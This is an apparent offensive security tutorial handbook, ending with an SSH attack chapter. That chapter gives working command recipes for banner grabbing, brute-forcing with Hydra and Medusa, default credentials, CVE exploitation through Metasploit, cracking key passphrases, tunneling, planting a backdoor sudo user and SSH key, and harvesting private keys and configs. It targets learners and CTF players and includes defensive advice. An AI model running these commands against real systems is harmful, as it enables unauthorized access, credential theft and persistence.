The {TrapdooЯ} Offensive Security Handbook
Every system has a hidden entrance. Learn to find them.
Welcome
Welcome to The Trapdoor Offensive Security Handbook - your comprehensive guide to offensive security and ethical hacking. This handbook will teach you to think like an attacker, so that you can defend against them.
What You’ll Learn
This handbook covers the complete offensive security methodology, from reconnaissance to post-exploitation. It consists of all the tools, tips and techniques I’ve gathered over 20 years in Information Technology in nearly 10 years of that time focusing on cybersecurity.
🔍 Reconnaissance - Finding targets and gathering intelligence 🎯 Enumeration - Identifying services and vulnerabilities 💥 Exploitation - Gaining access to systems 👑 Privilege Escalation - Elevating your access 🔄 Lateral Movement - Moving through networks 📝 Reporting - Documenting and communicating findings
Who This Is For
This handbook is designed for:
- Beginners with no prior hacking experience
- IT professionals looking to transition into security
- Students preparing for certifications (OSCP, CEH, CPTP etc.)
- CTF players wanting structured learning or a handy reference
- Anyone curious about how systems are compromised
Reality Check
The honest truth is that building and hosting software, managing hardware and networks is mentally demanding work, requiring patience and attention to detail. That knowledge comes well before we get into the business of breaking into networks, hardware and software. It is possible to start from absolutely zero IT skills, however my advice is that if this is you, use a guide like this alongside a basics in IT course. You will need to learn some fundamentals. I try my best to strike a balance between explaining concepts and providing an efficient reference for more experienced practioners.
With that all said, there are no real prerequisites required - just curiosity and a willingness to learn is all you will ever need in this pursuit. I’ll help you get started.
How to Use This Handbook
Progressive Learning Path
Start from Part I: Foundations and work your way through sequentially. Each chapter builds on previous knowledge.
Reference Guide
Already experienced? Jump directly to specific services in Part III using the sidebar navigation.
Hands-On Practice
Every chapter includes:
- 💻 Practical Labs - Hands-on exercises
- 📹 Video Tutorials - YouTube walkthroughs
- 🎯 CTF Examples - Real-world scenarios
- 🕷️ Trapdoor Tips - Quick insights
Companion Resources
- YouTube Channel: Trapdoor Security - multi-part video series on the basics (coming soon)
- Practice Labs: Set up your own environment (Chapter 2)
- Community: [Discord/Forum link]
Legal & Ethical Disclaimer
⚠️ CRITICAL: The techniques in this handbook are for educational purposes only.
You must:
- ✅ Only test systems you own or have explicit written permission to test
- ✅ Respect laws and regulations in your jurisdiction
- ✅ Use these skills for defensive purposes
- ✅ Follow responsible disclosure practices
Unauthorized access to computer systems is illegal in most countries and can result in criminal prosecution.
By using this handbook, you agree to use this knowledge ethically and legally.
About the Author
James R. Burger is an offensive security professional with 20+ years in IT. He created this handbook to make offensive security accessible to beginners and provide a practical reference for professionals.
- 🌐 Blog: trapdoorsec.com
- 🎥 YouTube: @trapdoorsec
- 💼 LinkedIn: James R. Burger
Support This Project
If you find this handbook valuable:
- ⭐ Star the GitHub repository
- 📢 Share with others learning offensive security
- 💬 Check out my blog
- ☕ Buy me a coffee (optional)
Acknowledgments
This handbook is inspired by:
- The IT security community
- All the students and professionals I’ve worked with who’ve provided feedback over the years. You know who you are.
- Creators like ippsec and liveoverflow. Check them out!
AI Use Declaration
In terms of this handbook, I do use Claude AI from time to time, primarily for review, summary and templating purposes.
However, the content itself, blog, guide & video content are all created and reviewed by me. I take full responsibility for the output of any AI tools that I use.
We’re all standing on the shoulders of giants here
I commit to crediting sources where I can, so that you may also benefit from the source material. If you do spot uncredited or unlicensed content I would appreciate you reaching out to let me know so that I can correct the issue.
Ready to find the trapdoor?
👉 Start with Part I: Foundations
Last updated: 24th November 2025
Welcome to the Trapdoor Offensive Security Handbook
Thanks for taking the time to level up your hacking skills with me. I sincerely hope this guide will serve you well on those long days or nights in front of the black mirror.
Go grab yourself your favourite beverage and get comfortable, there’s a lot to get through! If you’re feeling particularly generous, then feel free to get me a beverage while you’re at it =)
Suggestions and Corrections also welcome
If you are interested in suggestions for articles for this site then please reach out to me, and I’ll do my best to make it happen.
Building Your Lab
The [Good] Hacker Mindset
The mindset of good hackers can be categorized as a relentless curiosity.
Curiosity. Some people will tell you that hacking is something that only happens with computer technology. They’re wrong. The reality is that the idea of hacking comes from other places, long before computers existed. Hacking computers to do things they weren’t meant to, is the same mindset that a custom car enthusiast employs when they bolt on a different engine from an entirely different car.
They look for requirements, interfaces, interaction points, adapters. They hunt for errors and issues. They diagnose why their approach doesn’t work. They ask themselves ‘how could this work?’ instead of ‘why would I try?’. They try again, and again, until they get the result they want. They’re hackers, in my humble opinion. I’m sure there are other analogous pursuits, but I use this one as I have some familiarity: before I got into IT and cybersecurity, I was a qualified light automotive mechanic.
The modern use of the word ‘hack’, ‘hacked’ or ‘hacking’ came about in the mid 1970’s to describe illegally accessing a computer system. However, earlier verb usage as far back as 1735 the term ‘hack’ implied ‘to make something commonplace’. Later in the 1800s a ‘hack’ could also describe a hired mercenary. But the original term probably came from Old English c.1200 tohaccian meaning ‘to hack to pieces’.
Problem solving is at the heart of hacking too, and in this sense, possibly the best advice anyone ever gave on this subject was to break big problems down into smaller ones, i.e hack them to pieces.
If we consider that gaining entry into any system, be it electronic or physical, requires us to not only exercise good problem solving skills, but also risk management. Being detected is part of the problem space, and we often need to account for that.
Relentless. Some people like to solve crosswords, or rubicks cubes. This is problem solving, but they know there is a solution. They just have to find it. Knowing there is a ‘win’ state, motivates them.
Imagine the crossword in the daily newspaper, or that rubicks cube, had a pretty high chance that it had no solution at all. Most of those people would not even start trying to solve it. Any reasonable person would consider the risk of wasting their time too great.
Hackers approach the problem of gaining access to a computer system as though its inevitable that they will gain access, but they don’t always know if there is a way. Their curiosity to find out either way is what drives them into this frustrating place.
To be OK with this, I personally think of the act of penetration testing or red teaming as a series of scientific experiments. I create a hypothesis, test it and whether or not I succeed or fail, I have learned more about the system. If you carry this attitude, then you never feel like you’ve wasted your time. It’s easy to forget that what we do as offensive security professionals is really a small part of the wider Development Life-Cyle of a given technology product, and that generally involves some kind of testing.
This is the motivation that keeps me coming back to the profession: helping to make better products and services that enrich peoples lives, put food on peoples plates, or generally keep them safe.
Other motivations of hackers
Not all hackers do so with the best of intentions. While they may still relentlessly pursue curiosity, their motivations come from other places. In summary these might be things like:
- Money & Greed
- Power
- Activism
- Warfare / Espionage
I say this only to help you the reader understand that when we’re emulating attackers we might need to consider these motivations however briefly. If one of the best questions we can ask when designing a system is ‘How could a bad person take advantage of this?’, then surely the follow up question is ‘Define bad?’. Understanding attackers motivations can be key to defending against them.
To demonstrate this point, imagine three different hackers all breaking into the Bank of Foobarzia’s website. This website has a glaring vulnerability allowing remote code execution in the banks environment.
- The first hacker work as part of a Randomware as a Service (RaaS) operation and is primarily interested in exorting people for money
- The second hacker is a political activist with an axe to grind against a small set of the Banks customers
- the third hacker is employed by the military of the warring nation of Barfoobia
In the first example, after gaining initial access to the website the RaaS operator tries to fan out and infect as many systems as possible in as short amount of time as they can.
In the second example the activist doesn’t bother with the website vulnerabiilty. Instead, they ‘spearphish’ a particular individual they know to be dealing with the bank customers they’re after. They compromise this persons desktop machine instead, break into their email inbox and exfiltrate as much ‘dirt’ as possible on their actual targets, that they then use to damage the customers reputation.
In the final example the hackers motivation is to simply bring any or all of the bank systems to a screaming halt and to hopefully prevent their enemies finance systems from operating for as long as possible. They use the website vulnerability, but slowly take their time to enumerate the entirety of the banks systems and networks. Over time they slowly exfiltrate the banks entire customer list. 6 months later, they cause a week long IT outage in the middle of the holiday season.
In each case, the attackers motivations caused them to do different things. When we’re testing for a customer, we need to model our attacks on credible behaviours and test for as many of them as time permits. This may include threat modelling with our customers to understand what personas are the priority for the engagement.
Networking for Hackers
Passive Information Gathering
Active Reconnaissance & Port Scanning
HTTP/HTTPS (80, 443, 8080, 8443)
SSH (Port 22)
🕷️ Trapdoor Tip: SSH is often the first service attackers target after discovering it. Weak credentials, outdated versions, and misconfigurations are common entry points.
Quick Reference
# Quick Win Commands
nmap -p 22 -sV -sC [TARGET_IP]
ssh [username]@[TARGET_IP]
hydra -L users.txt -P passwords.txt ssh://[TARGET_IP]
Service Overview
What is SSH?
SSH (Secure Shell) is a cryptographic network protocol for secure remote system administration and file transfers. It provides:
- Encrypted remote command execution
- Secure file transfer (SCP, SFTP)
- Port forwarding and tunneling
- Key-based authentication
SSH is ubiquitous on Linux/Unix systems and increasingly common on Windows servers.
Common Ports
| Port | Protocol | Service Variant |
|---|---|---|
| 22 | TCP | Standard SSH |
| 2222 | TCP | Alternative SSH port |
Banner Grabbing & Fingerprinting
Manual Methods
# Netcat
nc -nv [TARGET_IP] 22
# Telnet
telnet [TARGET_IP] 22
# Example output:
# SSH-2.0-OpenSSH_7.4
Automated Tools
# Nmap banner grab
nmap -p 22 -sV [TARGET_IP]
# Nmap with scripts
nmap -p 22 --script ssh-* [TARGET_IP]
# Detailed version detection
nmap -p 22 --script ssh2-enum-algos [TARGET_IP]
Version Detection
# SSH client connection (shows version before auth)
ssh -v [TARGET_IP]
# Look for version in initial handshake
# Example: SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5
Enumeration
Enumeration Checklist
- Banner grab and version detection
- Check for username enumeration vulnerability
- Test for weak encryption algorithms
- Identify authentication methods supported
- Look for known version-specific vulnerabilities
Username Enumeration
CVE-2018-15473 (OpenSSH < 7.7)
# Using exploit
python ssh_enum.py --target [TARGET_IP] --usernames users.txt
# Metasploit module
msfconsole
> use auxiliary/scanner/ssh/ssh_enumusers
> set RHOSTS [TARGET_IP]
> set USER_FILE users.txt
> run
Authentication Method Discovery
# Check supported auth methods
ssh -v [TARGET_IP]
# Look for: "Authentications that can continue: publickey,password"
# Test specific method
ssh -o PreferredAuthentications=password [TARGET_IP]
Algorithm Enumeration
# List supported algorithms
nmap -p 22 --script ssh2-enum-algos [TARGET_IP]
# Check for weak ciphers
nmap -p 22 --script ssh-auth-methods [TARGET_IP]
Authentication Attacks
Password Attacks
Brute Force with Hydra
# Single user
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://[TARGET_IP]
# Multiple users
hydra -L users.txt -P passwords.txt ssh://[TARGET_IP] -t 4
# With specific port
hydra -L users.txt -P passwords.txt ssh://[TARGET_IP]:2222
Brute Force with Medusa
# Basic usage
medusa -h [TARGET_IP] -u root -P passwords.txt -M ssh
# Multiple users
medusa -h [TARGET_IP] -U users.txt -P passwords.txt -M ssh -t 4
Brute Force with Nmap
# Nmap NSE script
nmap -p 22 --script ssh-brute --script-args userdb=users.txt,passdb=passwords.txt [TARGET_IP]
⚠️ Warning:
- Many SSH servers have fail2ban or rate limiting
- Use
-t 4or lower to avoid detection - Monitor for account lockouts
Default Credentials
Common default SSH credentials to try:
root:rootroot:tooradmin:adminpi:raspberry(Raspberry Pi)ubuntu:ubuntuuser:user
Key-Based Authentication Attacks
Weak SSH Key Detection
# Check for weak keys
ssh-audit [TARGET_IP]
# Test key algorithms
ssh -Q key [TARGET_IP]
Private Key Exploitation
If you find a private key on a compromised system:
# Set proper permissions
chmod 600 id_rsa
# Connect with key
ssh -i id_rsa user@[TARGET_IP]
# If key is encrypted, crack passphrase
ssh2john id_rsa > id_rsa.hash
john --wordlist=rockyou.txt id_rsa.hash
Exploitation
Vulnerability Matrix
| Version | CVE | Severity | Exploit Available | Notes |
|---|---|---|---|---|
| OpenSSH < 7.4 | CVE-2016-10009 | High | Yes | Privilege escalation |
| OpenSSH < 7.7 | CVE-2018-15473 | Medium | Yes | Username enumeration |
| OpenSSH 2.3.x - 7.7 | CVE-2018-15919 | Medium | No | User enumeration timing |
| libssh 0.6+ | CVE-2018-10933 | Critical | Yes | Authentication bypass |
Known Vulnerabilities
Username Enumeration (CVE-2018-15473)
Affected Versions: OpenSSH < 7.7 Impact: Enumerate valid usernames
# Download exploit
git clone https://github.com/epi052/cve-2018-15473.git
cd cve-2018-15473
# Run enumeration
python3 ssh-username-enum.py --port 22 --userList /usr/share/seclists/Usernames/top-usernames-shortlist.txt [TARGET_IP]
LibSSH Authentication Bypass (CVE-2018-10933)
Affected Versions: libssh 0.6.0 - 0.8.3 Impact: Complete authentication bypass
# Using Metasploit
msfconsole
> use auxiliary/scanner/ssh/libssh_auth_bypass
> set RHOSTS [TARGET_IP]
> set SPAWN_PTY true
> run
# Manual exploitation
python libssh_bypass.py [TARGET_IP]
Common Misconfigurations
Misconfiguration 1: Password Authentication Enabled
Description: Password auth allows brute force attacks Check:
# From compromised system, check sshd_config
cat /etc/ssh/sshd_config | grep PasswordAuthentication
Misconfiguration 2: Root Login Permitted
Description: Direct root access increases risk Check:
cat /etc/ssh/sshd_config | grep PermitRootLogin
Misconfiguration 3: Weak Ciphers Enabled
Description: Vulnerable encryption algorithms Check:
nmap --script ssh2-enum-algos [TARGET_IP]
Post-Exploitation
Initial Access
# Establish SSH connection
ssh user@[TARGET_IP]
# With private key
ssh -i id_rsa user@[TARGET_IP]
# Specify port
ssh -p 2222 user@[TARGET_IP]
Port Forwarding & Tunneling
Local Port Forward
# Forward local port to remote service
ssh -L 8080:localhost:80 user@[TARGET_IP]
# Now access http://localhost:8080 to reach target's port 80
Remote Port Forward
# Forward remote port to your local service
ssh -R 9090:localhost:80 user@[TARGET_IP]
# Target can access your port 80 via their localhost:9090
Dynamic Port Forward (SOCKS Proxy)
# Create SOCKS proxy
ssh -D 1080 user@[TARGET_IP]
# Configure proxychains
echo "socks4 127.0.0.1 1080" >> /etc/proxychains.conf
proxychains nmap -sT [INTERNAL_IP]
Persistence
Add SSH Key
# Generate key pair
ssh-keygen -t rsa -b 4096
# Add public key to target
echo "your-public-key" >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
Backdoor User
# Create backdoor user
useradd -m -s /bin/bash backdoor
echo "backdoor:password" | chpasswd
usermod -aG sudo backdoor
Credential Harvesting
# SSH keys on system
find / -name id_rsa 2>/dev/null
find / -name id_dsa 2>/dev/null
find / -name authorized_keys 2>/dev/null
# SSH configuration
cat ~/.ssh/config
cat /etc/ssh/sshd_config
# Known hosts (pivot targets)
cat ~/.ssh/known_hosts
Tools
Enumeration
- Nmap: Port scanning and version detection
- ssh-audit: Security audit tool
- ssh-scan: SSH configuration scanner
Exploitation
- Hydra: Fast password brute forcing
- Medusa: Parallel password cracker
- Metasploit: Exploitation framework
- ssh2john: SSH key password cracking prep
Post-Exploitation
- ProxyChains: SOCKS proxy routing
- SSHuttle: VPN over SSH
- sshpass: Non-interactive SSH password
Practical Lab
Setup
# Use Metasploitable or create Ubuntu VM
# Ensure SSH is running
sudo systemctl start ssh
sudo systemctl status ssh
Exercise 1: Enumeration
Objective: Enumerate SSH service and identify version Steps:
- Scan for SSH service
- Grab banner
- Identify exact version
- Check for vulnerabilities
Solution:
nmap -p 22 -sV [TARGET_IP]
nc [TARGET_IP] 22
searchsploit openssh [version]
Exercise 2: Brute Force Attack
Objective: Gain access using password attack Setup: Known username, weak password Steps:
- Create small wordlist with common passwords
- Use Hydra to brute force
- Login with discovered credentials
Solution:
hydra -l msfadmin -P /usr/share/wordlists/metasploit/common_passwords.txt ssh://[TARGET_IP]
ssh msfadmin@[TARGET_IP]
CTF Walkthroughs
HackTheBox: Lame
📹 Video Tutorial: Watch on YouTube
SSH Attack Path:
- Enumerate SSH (port 22)
nmap -p 22 -sV 10.10.10.3
- Note OpenSSH 4.7p1 version
- Check for known exploits
searchsploit openssh 4.7
- Pivot to other vulnerable services (SMB in this case)
TryHackMe: Basic Pentesting
📹 Video Tutorial: Watch on YouTube
SSH Attack Path:
- Discover SSH on port 22
- Find username through enumeration
- Brute force with rockyou.txt
hydra -l jan -P rockyou.txt ssh://[TARGET_IP]
- Login and escalate privileges
Common Mistakes
⚠️ Don’t:
- Brute force without checking for rate limiting
- Forget to check alternative ports (2222, etc.)
- Ignore SSH keys found on compromised systems
- Use high thread counts (triggers IDS/IPS)
✅ Do:
- Always enumerate version for CVE checks
- Try default credentials first
- Look for SSH keys in user directories
- Use port forwarding for pivoting
- Document successful credentials
Defense & Detection
Blue Team Perspective
How to detect SSH attacks:
- Monitor
/var/log/auth.logfor failed login attempts - Use fail2ban to block brute force attempts
- Alert on successful login from unusual IPs
- Monitor for multiple failed authentication attempts
Mitigation strategies:
- Disable password authentication (key-only)
- Disable root login (
PermitRootLogin no) - Use strong passwords/passphrases
- Implement rate limiting
- Use non-standard port (security through obscurity)
- Enable 2FA (Google Authenticator)
- Keep OpenSSH updated
- Restrict source IPs with firewall rules
Additional Resources
- 📖 OpenSSH Documentation
- 📝 SSH Hardening Guide
- 🎥 IppSec SSH Techniques
- 🔗 Related Services:
- Telnet (23) - Unencrypted alternative
- FTP (21) - Often paired with SSH
Next: FTP (Port 21) Previous: HTTP/HTTPS